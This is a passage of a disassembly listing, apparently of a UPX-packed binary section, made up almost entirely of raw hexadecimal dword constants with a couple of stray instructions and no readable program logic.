loc_3144A0CB retn sub_3144A0C4 endp ; --------------------------------------------------------------------------- byte_3144A0D3 db 0Fh ; CODE XREF: UPX2:3144A092j ; --------------------------------------------------------------------------- jmp fword ptr [edx+63AB39C8h] ; --------------------------------------------------------------------------- dw 0B00Bh dd 45C172D8h, 85615AB0h, 0A6188BFCh, 1DDB2D41h, 70B4B96Fh dd 0B900A25h, 0D67386A9h, 35E3A16Ch, 0BCE3FA3Eh, 7F53119Ch dd 1B4911h, 0EA12FA75h, 5741CF7Ch, 6DEFF71Ch, 43CC4EDDh dd 23A98836h, 9224B3CFh, 0B744A0CFh, 9197F97Fh, 245B0CB0h dd 1DF379F0h, 3D433510h, 678E6B4h, 51DC6194h, 17A03FBFh dd 0CB4CF66Ah, 30A7993Ch, 25D687FDh, 5B203A9Ah, 0CD0072E4h dd 0B259CF6Eh, 9B06A731h, 36E96EE2h, 0E736AD97h, 9023C079h dd 0DE5D2A34h, 73CFFA6Ch, 3DA17ED0h, 0F48A2FA8h, 0ED30D07Bh dd 73E10CB3h, 2E9629CAh, 66DB8954h, 91D007F4h, 29B7B9A8h dd 9B7FA29Bh, 468E11D2h, 0FBFFA251h, 0B628998Dh, 0FB4C6FC4h dd 53990A4Ah, 0B665BDA0h, 68084CD3h, 0F8559EA9h, 82FD655Ch dd 0D5B01481h, 0F24DD9CBh, 0AE20A411h, 0F32C6FBFh, 9D900242h dd 60DD4209h, 2B8372E4h, 0C60EBF60h, 7BB6B554h, 369E085Dh dd 3C55DBC5h, 2B18BCC7h, 0E8453281h, 9B41C96Ch, 78FB6C19h dd 6ED8DBDCh, 0BE30A198h, 68FD2513h, 0EFA024BFh, 0E2D75554h dd 9E108220h, 0BC5CFDA7h, 6643F124h, 4EB83A9Ch, 45A6E75Dh dd 0BF409A3Ah, 8460D234h, 0F00DF57Ch, 0DBD0748Fh, 788C752Ch dd 5940B226h, 16785FD1h, 0D13B22A2h, 76E45975h, 0AECD1304h dd 6B58FC2Ch, 288253E1h, 0A96DC9ACh, 0AEECF106h, 0CE525697h dd 73292267h, 0B32319h, 0E54BA1C4h, 0B64F0300h, 894C85CAh dd 1788F904h, 1855CDA4h, 5F85CE7h, 7EB582D0h, 0F4F75E43h dd 44371284h, 0ED920BCh, 1E1086F4h, 0D748BA44h, 58150D64h dd 0C3B81CA7h, 0FC746D14h, 0DC289A0Eh, 0EE088244h, 4C980E7Ch dd 523883B4h, 0C60910BBh, 0CF40B34Ch, 50ED155Ch, 56B014AFh dd 76E95AC6h, 957607FBh, 0E3B0CA0Ah, 0F7900274h, 56C838FDh dd 6D59728Eh, 3932C016h, 0C84B28C1h, 0F559F18Ch, 5596EF47h dd 0A9188ACAh, 0DE52F6B0h, 168E126Ch, 1A8E32A4h, 86B42698h dd 85A237EBh, 43E5DA7Ah, 2E96054Eh, 0DB55838Fh, 9E26B92Ah dd 3EDBB49Dh, 0E80F010h, 7AAA971Fh, 71F062E2h, 0B62A9A88h dd 0CE55944h, 0D9983C47h, 0DB5F43C4h, 963E4D10h, 0F5BA37AFh dd 7687EA6Ah, 7735AD95h, 0FDE86CF4h, 981B7481h, 0E728353Ch dd 26C087FBh, 0DB433A9Ah, 8E36490Eh, 0B7C7B0FFh, 0A3F56D55h dd 0BDA82CB4h, 58DBA049h, 591169FCh, 5BDFC345h, 16BEC206h dd 4EC18A4Ch, 0EE45E7DCh, 35309428h, 68B083h, 2AD0ED5Dh dd 0CDBAB3Fh, 0C9E981B4h, 0CE22BA46h, 1B5747E9h, 5F012AAAh dd 0F3F062D4h, 49D6D708h, 45062DBBh, 26D50EF1h, 38D042B4h dd 924FF747h, 43A4808Fh, 3043FEC9h, 0B7D68E94h, 0F5433CCEh dd 5BC290C6h, 0E6321EB7h, 1EE00B1Ch, 3C04B1ACh, 0E4C4F9E4h dd 0C638C21Ch, 0BE1AEA54h, 38C248DDh, 8075AD94h, 0FE18BCC7h dd 0B61006B7h, 16888A65h, 4EAAE62Fh, 0C692A657h, 0BC5AA27Eh dd 9E68B01Eh, 2EA0628Dh, 0C894AD6h, 0BEFD20Bh, 0D67E81DAh dd 0F105AB3Bh, 47BFAE93h, 0CB7D62D4h, 0B61E8A0Ch, 0EE6CD1FDh dd 0D577817Ch, 5E3DC311h, 1B084CFCh, 0F85485A1h, 5698155Ch dd 549048C0h, 887DA533h, 2B20A43Fh, 0D22D95FCh, 1E914C9Ch dd 56D9D2ACh, 0EB5372E4h, 0B35ACF58h, 9702B233h, 53C473FAh dd 39E037A3h, 0A61DC514h, 0B2E53D34h, 0E988CC53h, 78FBB031h dd 13073DDCh, 0BE069952h, 0F402DA26h, 15D6877Bh, 4E614A8Ah dd 91082F5h, 0DAC15B07h, 0F1D7A640h, 70839009h, 0FD0651D4h dd 8014CCA9h, 0B934D244h, 1D269F83h, 9E554282h, 154E1C98h dd 2032B6DAh, 0E5C9EA3h, 14DA22FEh, 4D5ECF33h, 6EA59232h dd 0ECB1648h, 1E9007F3h, 0B559F39Fh, 0D8854BDEh, 0B3389C20h dd 0DA0C6366h, 44DB79A8h, 0EFC826B7h, 0A616173Dh, 8E049234h dd 46D8AB3Ah, 2055CDF7h, 3F85CE7h, 0B144FBD4h, 0FE4CAEB3h dd 12F6970Bh, 0A3304A8Ah, 0CDEF7D09h, 0ED0E2FD3h, 806BF252h dd 4790EE1Dh, 81A762D4h, 8013DC99h, 0A8F52D44h, 0CF983C47h dd 0A12FB9DCh, 966220ECh, 0CE2AB24Eh, 710EA36h, 0B5B02694h dd 26E83008h, 6AAB9E6Eh, 9E0E28C3h, 1E90362Bh, 8C20F39Fh dd 3FF8D1Bh, 0F02DEC89h, 0AF21B054h, 7C3DE5DCh, 0EDE064FFh dd 36DBAA38h, 0DE089A6Ch, 1688CA65h, 4EC03CCCh, 86F86ADDh dd 0BE30A214h, 0F668DA4Ch, 2EA03A21h, 66D84ABCh, 6143D4A5h dd 0E073E8B9h, 0A2D95964h, 0BDCDEA18h, 0F3338C36h, 8031EB99h dd 7B9F8044h, 26AE31D6h, 61BCC73Dh, 80E07ADAh, 8240B224h dd 73138533h, 57C272E4h, 138433BAh, 0CF76F763h, 0A73DBF50h dd 8B6F5274h, 56FE01FEh, 0B170F76Dh, 9AFBAA2Ah, 9B038316h dd 53C57BC2h, 4821DA0h, 0D56CE999h, 8D249468h, 16FC9909h dd 3CB441C8h, 86960FB0h, 0DF55D057h, 9F2EBF38h, 2EE177E8h dd 7BD38FFh, 0F756E780h, 0B705DF40h, 60E98214h, 5B86BFBh dd 0A9107A6h, 0D95ACA69h, 9D13B727h, 54DB0A3Dh, 3BA423D1h dd 0F9651FBEh, 0A614D750h, 62198F2Eh, 5BC26194h, 228D2EADh dd 0CF45E06Ch, 941BCA58h, 7BE46311h, 3AA755F8h, 0FE6C178Ch dd 0A86B982Fh, 96039235h, 73A86EE3h, 3A943BBCh, 0C77DF894h dd 0B716C250h, 7FDC9F00h, 219457C9h, 0F28B138Fh, 0D764CF71h dd 0B068BF21h, 62C577F6h, 7AA28D5h, 0D910FB86h, 0BF0ECE49h dd 7AC19708h, 24D158E8h, 0D9516A1h, 0D36F9A4Dh, 82099430h dd 5CF15919h, 3B9742D1h, 0FA613C98h, 0A329E641h, 633FEA39h dd 5ADF6FE0h, 3E8D36B9h, 0C244FC65h, 0A1588B59h, 7BC47611h dd 3F8E4AC1h, 0EF4E1788h, 0C679CF71h, 0AA048713h, 66D877E9h dd 2F8826A5h, 0D27DCDFCh, 0AD22A762h, 16E69505h, 18B457E3h dd 0EF8B18B9h, 0C675CC7Bh, 932FDA0Dh, 42CF44F0h, 2FBD27C9h dd 0EC7FE49Ah, 0BF3CDB41h, 0EC19C0Bh, 22D945D0h, 0C920B98h dd 0F751E86Dh, 9E019F44h, 51FD632Ah, 379624FBh, 0D9081F80h dd 882ED754h, 4B1D8635h, 57C052F5h, 76A93DA2h, 0C045E24Bh dd 8537B86Ch, 1EE37111h, 35A748FCh, 0BD730181h, 0B451EC2Eh dd 0AE709627h, 53CB75FEh, 5CD321B7h, 0D260EFB2h, 0AA359134h dd 73E4932Ah, 3CB446E5h, 0F28D08B5h, 0BE71D171h, 0B01CBF1Fh dd 7AC57EEDh, 66BD27D5h, 0FB75EEA7h, 0AF1BBA5Ch, 63E58617h dd 23D543C8h, 17B60D80h, 0DF7CFF60h, 0BB60B729h, 56F96712h dd 29B52BE2h, 0FF4E1CA3h, 9840D748h, 730C9835h, 52F14EF5h dd 768B35A0h, 0DA49E053h, 8A318C59h, 6ADE0211h, 23A25EEDh dd 0FC500697h, 0AA51DC75h, 8D158531h, 53C375D8h, 1AAE52AAh dd 0C77DF8BFh, 0B716A740h, 58889F00h, 2BB271D0h, 0D69D1EBDh dd 0DB53CD66h, 0B868A93Fh, 4BD251F0h, 36BD3EDDh, 0FB73ED86h dd 0AE0DC95Fh, 4DF4BC64h, 32D94FEEh, 1D9531B1h, 0D847F378h dd 0AD149C44h, 52F96F0Eh, 3BA317D1h, 0F97A2A9Eh, 0BD33D747h dd 4B0CA45Ch, 57E652F5h, 10A72DA9h, 0DA43F757h, 0E636A555h dd 6EDF763Ah, 3F8E54C9h, 0C0001788h, 0A348E568h, 9102B23Ah dd 45DB7FEFh, 0B8B3D90h, 0D2568A92h, 0B035B27Bh, 62EB9F3Fh dd 4EAE5DCDh, 0F4A81E92h, 0DD55D67Bh, 84018C38h, 42C167F0h dd 9B52FF1h, 0D010FB86h, 0B33DEB58h, 60C98B16h, 2BCA45FAh dd 119916B5h, 0DD47CE62h, 0A060BC21h, 4FEA5D08h, 378627C0h dd 0F77D0E9Eh, 0A325FF48h, 6019833h, 6BDC56C6h, 198B33A2h dd 0DA73F760h, 8136A34Eh, 70D16D20h, 229B53DFh, 0E96E1B96h dd 876BFD1Ch, 8C119607h dd 36D86FF8h, 1D8F3EA7h, 0C577F999h, 0DE24A75Fh, 78E6950Fh dd 4EB451C1h, 0EE8C0FBBh, 0DC44D17Bh, 9B09B435h, 4BD212E1h dd 15D83CDFh, 9E74EC91h, 0BD2BD55Fh, 47808601h, 34DD5EF2h dd 3D8407BAh, 0D35BF560h, 8A0EB30Ch, 6F986F10h, 2CB536DAh dd 0D17C1F82h, 0A103C641h, 651D8432h, 6DD447E0h, 139C3BB8h dd 0DA4EDB04h, 8336B859h, 7BE04D00h, 1FC87BC2h, 0FC65068Ah dd 894CCF72h, 0AB1E8724h, 36E976FEh, 0B943C8Dh, 0D27DE48Eh dd 0BA31A766h, 73E4932Ah, 188473A4h, 0B5B13A9Dh, 0F2748C26h dd 933ADA00h, 41CC51E3h, 3932FCFh, 0FB42828Dh, 0B338F54Bh dd 77E5B90Ah, 46F952D9h, 2F970786h, 0CF5AFF79h, 9B0CB312h dd 67E04F19h, 39B510B4h, 0C07C1FBFh, 0AB35DE45h, 6399219h dd 544611C2h, 0FDBE0CCEh, 0FC21F8D0h, 0B040B8C3h, 21E0978Bh dd 92433A9Ah, 0DE5624B2h, 0DE48554Ah, 0C5AE77ABh, 0F22B1ABAh dd 66220CD4h, 5D5107FCh, 0B6010A1Fh, 0FE88FA6Ch, 4DE47E29h dd 83926AB6h, 0D463F245h, 0A6A45149h, 7AF0C60Fh, 34890AD6h dd 98857DA7h, 55488C10h, 9B7FFEA0h, 468E1692h, 0BDF8A657h dd 8D3C0F81h, 2753D272h, 4ECA0A16h, 5EE24284h, 0C759BE67h dd 9F10F24Eh, 0C6FBF236h, 30DA769Ch, 747DA59Ch, 2D20A438h dd 346BEAF8h, 879FC2F1h, 0E12CD6Eh, 0D9C3B0C7h, 7D0552Fh dd 0F18F1DABh, 36A8BF08h, 678802C4h, 2D188A8Ch, 5550A8E0h dd 7EC890A0h, 4ED032A4h, 0ECAA68B6h, 0CE39CA14h, 0F602DA4Ch dd 0D1F041D5h, 50E3BC29h, 6149DDF4h, 0E073FCB9h, 7A7F7764h dd 3A35A1EDh, 9DF054C1h, 0B6BD1700h, 0ED60E454h, 0D9CB5DADh dd 0BC55C966h, 1B084CD7h, 0CE6749ABh, 0F953025Ch, 0BB3BDD6Bh dd 76DE6136h, 86681D89h, 0FCB0CA3Ch, 956FFD8Bh, 60F3DC29h dd 0C18FFFE4h, 2E38AA34h, 18F1D5Dh, 0D429F07h, 0AE6552F2h dd 2995AA88h, 0DE50EA68h, 0E9760E84h, 0BC45B95Bh, 3F85CE7h dd 333BD6D4h, 0F640B3C3h, 0D07FFA84h, 0A153B543h, 764541ABh dd 0D648BA2Ch, 1E6D7339h, 75B81C87h, 0E375EF1Dh, 0E728AC12h dd 0BE318310h, 0B3675B2Dh, 5EE679C6h, 692C7E6Bh, 0F87BF4B1h dd 2BAB75Ch, 3E587794h, 2BE85ACCh, 0B51F7F85h, 1932CA0Ah dd 59A97F9h, 4983A9Ah, 8E245229h, 2BBAA36h, 7BB78458h dd 369E01DCh, 0EB277209h, 0A62E91AEh, 0DE7AC210h, 0CE23931h dd 4EC9DAFCh, 0C4756ADCh, 77CE0875h, 9FAB2A39h, 189C7211h dd 6E5C4FBCh, 0B99C0FCh, 0D67E864Ch, 5B431093h, 46B82A74h dd 93713FD4h, 0B61E8195h, 0D2044FCFh, 5A1B0A4Ah, 51D04A90h dd 9608C368h, 0C6AC3324h, 5278EA5Eh, 3EB126FCh, 0EC7DA5CCh dd 2520A43Fh, 0C2DC47C0h, 1E900370h, 0BEC850FCh, 8E0072E0h dd 0C66AF84Ah, 68E51D03h, 5A82CB7h, 6A77DF0Dh, 0F7188AFDh dd 8F52A865h, 16E0FB06h, 1C8032A4h, 0BD9AFF23h, 3BA6A222h dd 0A633AEBAh, 2FA47AD0h, 998F4ABCh, 9C30A640h, 43B7BA2Ch dd 0EB6CE26h, 3278AFC5h, 2EE481C2h, 0B6424E87h, 0B8378316h dd 1D429F83h, 0DB894282h, 0C0D80F2Ch, 0F50627DBh, 51F5EA6Ah dd 54E770D0h, 0E1650288h, 0AE209300h, 8C98F997h, 0B5635B64h dd 6986AFCh, 0DC5022B4h, 0FD523FE3h, 3AF1E262h, 36A81884h dd 66C4263Bh, 9A2A1F03h, 2103C202h, 20B4C8F9h, 4A026FA4h dd 8CC6EADCh, 3576A361h, 0C07DA2C1h, 0A3B9F184h, 50C84A29h dd 0C8C181F4h, 16CC68D3h, 0F9F7A6Bh, 0C2B72A9Ch, 7EF063C4h dd 0C312A48Ch, 0D0E09454h, 271C057Ch, 0DED042B5h, 677D5AD2h dd 9E7E3362h, 733FA415h, 0F87FA9D6h, 5DA75B8Ah, 0AE4AC3CAh dd 190B9C6Dh, 28AC28E1h, 97F363ACh, 8EDFF7EBh, 43B5AA1Ch dd 0FE46FCC5h, 3AC01AE6h, 3EE052C4h, 8C8D75AFh, 0E350F408h dd 1688FA60h, 4E7FB7ABh, 37116ADCh, 3F30A214h, 0BF3A8A72h dd 8B251DD2h, 0E5D84ABCh, 0A2BC8A32h, 4FCCB521h, 3280F264h dd 0EA4B5FBCh, 0FBFF58E8h, 0B6289A80h, 0CE40DFE9h, 7A52A5Ch dd 2BA427D3h, 0B634D693h, 0B0C1CE51h, 7210CAA3h, 0BFC157E0h dd 4C9859B2h, 0C655BD2Bh, 0E6A78DFAh, 0E2A337Bh, 0A1C83A8Bh dd 1BFF2006h, 0C60E91D6h, 0AE202267h, 3F404ADCh, 2AE052C4h dd 0CA76FD93h, 0DE34A35Bh, 2AB26F93h, 8E453292h, 4FCB5CA8h dd 8254279Dh, 9E39DA7Ah, 0AEA01084h, 368E1BEDh, 0A22E170Bh dd 43C5BA1Ah, 0EB6E9F7h, 127119CCh, 2FA23285h, 0C4BD655Dh dd 6960E47Fh, 0B3672E78h, 5EE679F2h, 1B88B914h, 0CE76A74Fh dd 6CBB135Dh, 0C1B14895h, 729BA5FFh, 13A087FBh, 0E66E8A34h dd 9BCE7675h, 65924E6Ch, 3DD0F93Fh, 0FA68A917h, 0E3C757D9h dd 8C231ABAh, 6EE053C8h, 0A7100077h, 2653C234h, 9DE83147h dd 2F66C16Fh, 64BF6FA8h, 3D1E49E1h, 7D3BD58Bh, 0FA2B4548h dd 26B21EECh, 617AD0A5h, 0EA4E2FD3h, 830BF252h, 468E11E6h dd 55FCA657h, 0B1C119C3h, 0EE0AD583h, 69110A94h, 118381B7h dd 0D75F2EAAh, 831CF776h, 690A8935h, 4AD64DE7h, 18810D90h dd 0DD57FD60h, 942D8960h, 6AFE6706h, 25BA5FFAh, 0D26E1D8Dh dd 0AA48D259h, 8C15903Bh, 44C94E8Ch, 269437A3h, 0A66CF993h dd 8E50C236h, 1688FA6Ch, 2AA340CDh, 0E39110F2h, 0D2408C72h dd 0B521944Ch, 4DC332CFh, 10AC25C4h, 0CB1AE390h, 0F61AFF7Fh dd 47CFB813h, 309E0AD2h, 0B8410BDh, 0B6C0CF06h, 0B360D244h dd 383BE7FDh, 0DB164282h, 963E6F87h, 50D54D24h, 0C778DC67h dd 2C43D7Ch, 0C36344A6h, 0AE16A952h, 0C8646665h, 9FF62801h dd 23D5C592h, 0D4BDFFC7h, 4D389C20h, 5B27E022h, 0B325BFEAh dd 6ED66515h, 91EF0F73h, 57AAC202h, 5804002Ah, 4F71C95Ah dd 0E713A53Eh, 41CBBDFCh, 0D21459B3h, 7BD5168Ch, 26D0CF7Ah dd 761082C2h, 0D648BA24h, 20C3B437h, 46F466D8h, 455AF72Bh dd 76239A3Ah, 84F3C530h, 0B367597Eh, 5EE679E6h, 9E7CBA69h dd 8E4837DAh, 0D687EA6Ah, 0C034CA07h, 7D00A533h, 0FD209204h dd 0A907897Ah, 52D42C27h, 0C3373AE0h, 8E36494Eh, 39C6C3F4h dd 0B9E0AABh, 0BB57E573h, 6ED64015h, 239543CFh, 0DE668230h dd 47D9AB3Dh, 1F9163F4h, 0BD5EFF23h, 0B5D8A222h, 0A368DA4Ch dd 1DF257D7h, 2A9C648Eh, 0BEF82B8h, 0D67E8186h, 0E80F88Ch dd 36CB5D9Ch, 0A9E0BA6h, 0E628DB6Ah, 0D53247BBh, 0A3110A4Ah dd 5EE679EEh, 1B854BE3h, 0CE76AB55h, 3A186FD5h, 0C1E122A2h dd 40D3F059h, 0AA480104h, 6B58CA3Ch, 28897CC1h, 0EB4563ACh dd 8E364EA2h, 39CD05F4h, 7BB784ABh, 369E04E6h, 0CB6302C4h dd 0A62E9490h, 0F4C54F34h, 4688CC72h, 24C158F0h, 849038DCh dd 41B0A214h, 0C05490D9h, 74609784h, 0EB5568C9h, 9E269CA9h dd 5B4ED07Eh, 389E98D1h, 16EE7E9Ch, 81A23384h, 8014D499h dd 7B9F8A44h, 26AE363Ah, 60B7C772h, 7E087ADAh, 0CE40B228h dd 4537B90Bh, 108211DFh, 76A41688h, 958A07FBh, 8ECBCA0Ah dd 1E900273h, 4E1D8F21h, 35972D2h, 0F004BCA1h, 0B5A0A54h dd 3A40E573h, 39E052C4h, 0E851C4B5h, 9A7E9671h, 0E988B620h dd 78FB9831h, 8938EFDCh, 0BE329790h, 0F300494Ch, 0A3A01284h dd 50C15909h, 239DDBF4h, 0D67E861Eh, 0F174018Ch, 7005A963h dd 7EF054E8h, 0B4381E03h, 2E1D244h, 26980BECh, 5FD12AE0h dd 3F77AECh, 0CE768E32h, 7E82EDDh, 0B5E02294h, 24E83018h dd 921607FBh, 26DDCA0Ah, 769D772Dh, 56C82924h, 0B5CAE71Bh dd 24D3AA2Ah, 0E01C5FD7h dd 43A81ABAh, 1E65DFEDh, 0F618BCE2h, 0E27257CBh, 0D60DFA5Ah dd 4F49B6ABh, 0C6736ADCh, 41302918h, 9AED557Ch, 0E8A0249Ah dd 50E62D39h, 9E7A83F4h, 0D422BB46h, 32AE679Bh, 0BE3B2AAAh dd 1E746D2Bh, 25289A0Dh, 0F00847C9h, 36F20A4Ah, 0CB2F11E6h dd 963E46F2h, 4B4F72A1h, 678EB1Ch, 20329F19h, 7E595AFAh dd 51DABBECh, 0E6CCA2C3h, 35CE0274h, 72FCB34Ah, 2C958DB0h dd 4B389C27h, 0C86E72E9h, 0DEA9AB8Ch, 911FA8CEh, 0B8651F71h dd 0DE3AC202h, 1688EE04h, 0B19360A4h, 0B0C44049h, 9A742F14h dd 0F2FD5758h, 7EA024C4h, 0EDD2FCB3h, 5F04A6B0h, 9C4AB2CCh dd 0CCAE065h, 4DBB608Eh, 0FEF84690h, 56E995EDh, 0AA6B834Ch dd 14671A58h, 366DCFE4h, 7E084CD0h, 0CE40B238h, 7E4EC479h dd 10900CB4h, 53CD60ECh, 0D618BC21h, 0C378B219h, 51DA0807h dd 56E874E5h, 0D4958DB3h, 47389C27h, 0FE704E90h, 66A8708Ch dd 0FB1F0193h, 0A62EB6D6h, 0CBD44FBFh, 16E2FA5Ah, 87AB2947h dd 83103BD1h, 9830A214h, 0F662BE69h, 7435EDD3h, 0E5D87C87h dd 75408E30h, 0D64FD227h, 0B30DF264h, 468E340Ah, 0EB0F3183h dd 0B61EA626h, 0BA1E12C1h, 1AF0BFF1h, 0FB534282h, 963E6F68h dd 0A9CD3F24h, 2D78DC62h, 6FB0485Ah, 0E317099Ah, 0AE16AE22h dd 985832BFh, 0E01B935Bh, 6AA08F21h, 83B072D2h, 0D64D04EEh dd 4670A34h, 44C9E573h, 0E3E9B1D3h, 4CF38B8Bh, 107B0DBFh dd 2AE047E1h, 0EA333292h, 3F139D5Bh, 0A4A55D47h, 7668EC70h dd 18B57939h, 4CAC4BBCh, 9E65B29Ch, 1CDD452Ch, 8E80C45Fh dd 70864D21h, 6F8462D4h, 0A8441FCBh, 0EE60D272h, 0A35E0A7Ch dd 5EE67CD3h, 680093ECh, 4B874DDBh, 64EFF28h, 0BEB02294h dd 76EC9891h, 8E6F9809h, 8837A552h, 3EF66D54h, 33AE53C0h dd 0AE4F52C5h, 0A355C368h, 0DE1F9674h, 53C47FEFh, 1A8120A6h dd 0AC15AB99h, 0FE70E214h, 65A8B54Ch, 2BAD5FD1h, 0E79F4AAEh dd 0D055C666h, 0A462D76Dh, 40C57EE1h, 15BD26C8h, 0BE69EE87h dd 0A638DB44h, 60E1D21Dh, 3EDD0AF8h, 0A9307A4h, 9A5CF46Dh dd 8F14A164h, 48F16E12h, 73F078D3h, 0F75F70E1h, 0A728D150h dd 67588D32h, 5A904EF8h, 17C823ADh, 0C000F66Ah, 9230AD55h dd 71F62258h, 24AE1ADEh, 0EA6E178Dh, 0E6718A6Fh, 8A198323h dd 61A217B6h, 0B9237ACh, 0C36AEBDCh, 0AB3FBB14h, 64EEDA40h dd 2AAE57CDh, 0C5D855AFh, 9F55CF7Bh, 0D61C936Ch, 5A8061EDh dd 47BD27D5h, 0B964CBD4h, 0B7249A5Fh, 0AA19710h, 0C988ED18h dd 0D6370A4Ch, 0B56438ADh, 0C72F063Eh, 8988AC68h, 5EB02CCBh dd 0CAC0E520h, 1E82DEE8h, 26C1C838h, 3EAE41D7h, 76E85ACCh dd 0AE209204h, 0E658CA3Ch, 1E900274h, 56C83AACh, 8E0072E4h dd 0C638AA1Ch, 0FE70E254h, 36A81A8Ch, 6EE052C4h, 0A6188AFCh dd 0DE50C234h, 1688FA6Ch, 4EC032A4h, 86F86ADCh, 0BE30A214h dd 0F668DA4Ch, 2EA01284h, 66D84ABCh, 9E1082F4h, 0D648BA2Ch dd 6E80F264h, 796C8F1Fh, 0FDF062E2h, 801742A9h, 596FD244h dd 75151E3Fh, 15674DACh, 1DD879EAh, 0E5649660h, 1F0AE61Eh dd 4DB860AFh, 62AAD1D8h, 272CD02Fh, 0D0671EA9h, 0C6158B74h dd 0BDC80C93h, 0A6C2F1E1h, 45973FEh, 7BF8E250h, 369E3EEAh dd 6EE0362Ch, 0A607E2FCh, 5BDDC234h, 16BED9FFh, 3AD80BFDh dd 8238E9D0h, 3BCF55F6h, 0F65EE5F8h, 2D79E547h, 50FC2C31h dd 610061F4h, 0D6C7465Ch, 0EC841AE7h, 0D525A36Ah, 0FDF054F7h dd 0B35C9A36h, 9C63E06Fh, 0DAD6876Ch, 0DD8E19ECh, 927C7AD6h dd 0CDAB80DBh, 0EE6898A3h, 0C14FDDC3h, 0FBC394E7h, 0AE16ADDCh dd 0D213C964h, 0A6158DB7h, 91C80C93h, 0B83FC661h, 0C638AA1Ch dd 0FE4C0A54h, 0B3231A8Ch, 6ED66D70h, 59EE1C14h, 0DE482ACBh dd 0AB0BFA6Ch, 4EF60D10h, 0FF01FDCh, 8814AD89h, 9F4314Ch dd 189FA609h, 0E35789BCh, 9E26BD4Ch, 0E9FC2FA5h, 0D68F252h dd 75B82A9Ch, 0ED7BA11Dh, 0B6289A8Ch, 108D3A16h, 0B39BF583h dd 5EE67D6Ch, 0EC8BACEFh, 4A4FB228h, 678EB5Bh, 3EA05817h dd 7615DEC3h, 0ECAB9204h, 2EB09A30h, 1D6FFD8Ah, 60F7E229h dd 0DEC671E4h, 3FB8A296h, 7E699654h, 35DC3475h, 0E511B984h dd 47998BB4h, 18F1DEBh, 5ACC03EDh, 0A2B532E8h, 5304185h dd 313F58EDh, 0F668DAFBh, 0D0D893E2h, 0E3D7788Fh, 9E10825Fh dd 0D672397Ah, 440BF711h, 0CDBAC18Ch, 2F0161DEh, 49D6E8E4h dd 36D5D1BBh, 8B983C43h, 0A5A88231h, 968CFEE3h, 7BBFB224h dd 64ED584h, 0C0E5CAC4h, 0F3EBA533h, 0AE16ADDCh, 0D9804FB3h dd 1A930242h, 964B6988h, 81DB41E6h, 0D4DBA2AAh, 0AD502BD4h dd 328C3E4Dh, 47C44EEDh, 0E643AEF0h, 25D12BDFh, 0CB332D63h dd 0B5410CD0h, 5D962F74h, 45B19460h, 9C9E115h, 0D5213CF0h dd 0CA6D686Ah, 6591A480h, 251053BFh, 0F501EC10h, 0B5E0C3E1h dd 857174A0h, 570DA54Ah, 15E1DC30h, 0C7BD354Ch, 0CB2F44C0h dd 963E4554h, 31315B7Fh, 852615A3h, 0D1593656h, 0B517A532h dd 0F624F807h, 19ADFCD4h, 5E058A8Bh, 30C80C8Ah, 8C18435Ch dd 0C5DC6AFEh, 55160056h, 0DEF01CE6h, 911FA7DFh, 2110487Fh dd 8655A8E5h, 0E97DF484h, 4D3AB25Bh, 0D64861AFh, 98702716h dd 1DC2DA7Ah, 76C878A3h, 6522CA16h, 8FA09A81h, 29BC54C4h dd 0E814A9Bh, 943C2A9Ch, 9E216FA0h, 40C350F2h, 0EED8D7AFh dd 8D180A7Ch, 0D313FD56h, 0A030CA79h, 39979924h, 838F2986h dd 3E861A31h, 7EE85ACCh, 6FE0070Bh, 63AEC1DCh, 1EA63AD7h dd 30CE4FADh, 6525FBE9h, 65BD5C0Fh, 0FC70D46Ch, 3BCE1CF9h dd 6A0B77F5h, 8319879Ah, 62B86952h, 9D770593h, 0DB4906E7h dd 86CE5510h, 3BC761BFh, 0F65EE2E9h, 26A01284h, 6218DFB3h dd 2F82848h, 5FB745D3h, 38BF22F1h, 0E53DDC9Ch, 7FF054ECh dd 87279E79h, 2E4BD0AFh, 0A36FC9D7h, 5EE67A11h, 9E087AECh dd 4BCA9550h, 64ED2C3h, 58BBC255h, 10ADD1C1h, 4D822AFh dd 0DEC74FB6h, 0FE510242h, 32AF3FB7h, 0BDAB746Dh, 2D93CCDCh dd 71145A46h, 0BC031A89h, 58D8CD41h, 67408EFCh, 1DFBDAD4h dd 366306DCh, 4E2B8AC2h, 9F13C1BAh, 5668A67Eh, 99729B3h dd 0EF721609h, 63BE425Ch, 3576427Dh, 46F8B9C7h, 568298CEh dd 0B94BCC74h, 0A22E62Bh, 0EE20F03Eh, 119308ACh, 5452F483h dd 0A0153677h, 68C10E26h, 309BC6EEh, 0F8749E96h, 0C0BC565Eh dd 0C6E42E06h, 1EED79FDh, 569121C1h, 0AE55E981h, 9509D154h dd 0B6B0CF69h, 43CFAA2Ah, 0FE46DAF1h, 0B6A81A8Ch, 0E5051B0h dd 39D7D56h, 0DE50F40Ch, 6280FA6Ch, 0C5958AA3h, 0C9536A30h dd 869527E3h, 0F66BDA7Ah, 0AAAF1384h, 66D84A6Bh, 35BA6A44h dd 0E9F407A5h, 0E630F252h, 0FB318136h, 7EC65D14h, 8E8D1FFBh dd 0EE63D272h, 33EC0A7Ch, 6675C743h, 96087ADAh, 0CB34B324h dd 0F9862BB4h, 9459926Bh, 0CA6DD167h, 2520A43Bh, 6F90E1F3h dd 28AFC6C9h, 0AA80B3ACh, 7164155Ch, 60B012Ah, 7B874932h dd 369E2229h, 6EE052C7h, 23EE8488h, 0DE66FA97h, 0FE8D8EECh dd 0B13FCCE6h, 0F9C0D64h, 7E030932h, 739F712Ah, 2E962A21h dd 66D84ABFh, 1BE6D780h, 0D67E828Fh, 0E68587E4h, 0B947D482h dd 810DC63Ch, 5E082AF3h, 119F29F2h, 9EFE339Fh, 0F5B6574Bh dd 383D17Dh, 0CE768A81h, 0C48F38ABh, 3EB02297h, 8004EB9h dd 1EDF6DF9h, 1DC82223h, 0A6F6FD8Bh, 0FDAE2F53h, 418BD975h dd 0F9FC2F97h, 365BE262h dd 0C1545205h, 58D8F741h, 0A61889FCh, 297EB634h, 20B05FE9h dd 4EC032A4h, 71DA1EDAh, 88080791h, 0F668DA4Ch, 0C6A56785h dd 9927B74Eh, 0A6B50703h, 0D648BA1Ah, 0BF4F664h, 0B9462774h dd 0DB75952Bh, 0B228AC34h, 9A60D244h, 0D8FFE26Bh, 7768BD4Bh dd 3DC0842Ch, 0BA80BA9Ch, 73C04158h, 95D7C96Ch, 4E4DDF3Bh dd 0AE289232h, 0A92DCA3Ch, 2633BFF4h, 22C83A9Ah, 703B9AA2h dd 0EF8055E3h, 0F4B9CB4Ch, 908529h, 6D0492C4h, 9E872FF6h dd 6EFBC202h, 930250DDh, 4EF60A07h, 8CB8DA76h, 88083D91h dd 4E0E704Ch, 